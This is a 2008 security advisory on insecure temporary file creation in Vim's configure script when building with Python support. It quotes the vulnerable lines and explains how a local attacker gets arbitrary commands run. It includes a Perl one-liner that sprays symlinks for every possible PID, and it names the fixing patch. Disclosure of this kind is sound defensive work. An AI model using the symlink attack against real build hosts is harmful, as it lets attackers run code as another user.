Vulnerable Vim
Insecure Temporary File Creation During Build: Arbitrary Code Execution


Product  : Vim -- Vi IMproved
Versions : >=5.0 (possibly older; 4.6 and 3.0 not vulnerable), <7.2b.014
Impact   : Arbitrary code execution
Wherefrom: Local
Original :

Insecure temporary file creation during the build process is vulnerable
to symbolic link attacks, and arbitrary code execution.  Patch provided.
Update: There is no race condition.  All files can be prepared
beforehand, facilitating a reliable attack.


  ``Vim is an almost compatible version of the UNIX editor Vi. Many new
    features have been added: multi-level undo, syntax highlighting,
    command line history, on-line help, spell checking, filename
    completion, block operations, etc.''

    		-- Vim README.txt 


During the build process, a temporary file with a predictable name is
created in the ``/tmp'' directory.  This code is run when Vim is being
build with Python support:


    677         dnl -- we need to examine Python's config/Makefile too
    678         dnl    see what the interpreter is built from
    679         AC_CACHE_VAL(vi_cv_path_python_plibs,
    680         [
    681             tmp_mkf="/tmp/Makefile-conf$$"
(1) 682             cat ${PYTHON_CONFDIR}/Makefile - <<'eof' >${tmp_mkf}
    683 __:
    684         @echo "python_MODLIBS='$(MODLIBS)'"
    685         @echo "python_LIBS='$(LIBS)'"
    686         @echo "python_SYSLIBS='$(SYSLIBS)'"
    687         @echo "python_LINKFORSHARED='$(LINKFORSHARED)'"
    688 eof
    689             dnl -- delete the lines from make about Entering/Leaving directory
(2) 690             eval "`cd ${PYTHON_CONFDIR} && make -f ${tmp_mkf} __ | sed '/ directory /d'`"
    691             rm -f ${tmp_mkf}

The attacker has to create the temporary file
``/tmp/Makefile-conf<PID>'' before it is first written to at (1).  In
the time between (1) and (2), arbitrary commands can be written to the
file.  They will be executed at (2).  Update: if the file is not
writable, the truncation at (1) will not happen[2].  The attacker may
create files for all the possible PID values in advance:
	time perl -e 'foreach (1..32768){ symlink "/path/to/exploit",
	    "/tmp/Makefile-conf$_" }'

	real    0m30.963s
	user    0m0.072s
	sys     0m29.694s


No test case.


Patch fixing this vulnerability can be found at the following URL:

Please note: The patch fixes ``src/'', an input file used by
the ``autoconf'' command.  ``autoconf'' uses this input file to create
``src/auto/configure''.  It is necessary to remove the latter, if
present, to force its recreation.  Otherwise, further build runs will
still use it, and the vulnerability will still be present.

Patch 7.2b.014[1] fixes this vulnerability.


[1] Patch 7.2b.014
    Message-Id: <>

[2] Thanks to Robert Buchholz for pointing this out in:
    Message-Id: <>


This advisory is Copyright 2008 Jan Minar <>

Copying welcome, under the Creative Commons ``Attribution-Share Alike''

Code included herein, and accompanying this advisory, may be copied
according to the GNU General Public License version 2, or the Vim
license.  See the subdirectory ``licenses''.

Various portions of the accompanying code were written by various
parties.  Those parties may hold copyright, and those portions may be
copied according to their respective licenses.


2008-07-26 Update: There is no race condition
2008-07-24 Added info on Patch 7.2b.014 (fixes the vulnerability)
2008-07-18 Formatting changes
2008-07-17 Sent to: <>, <>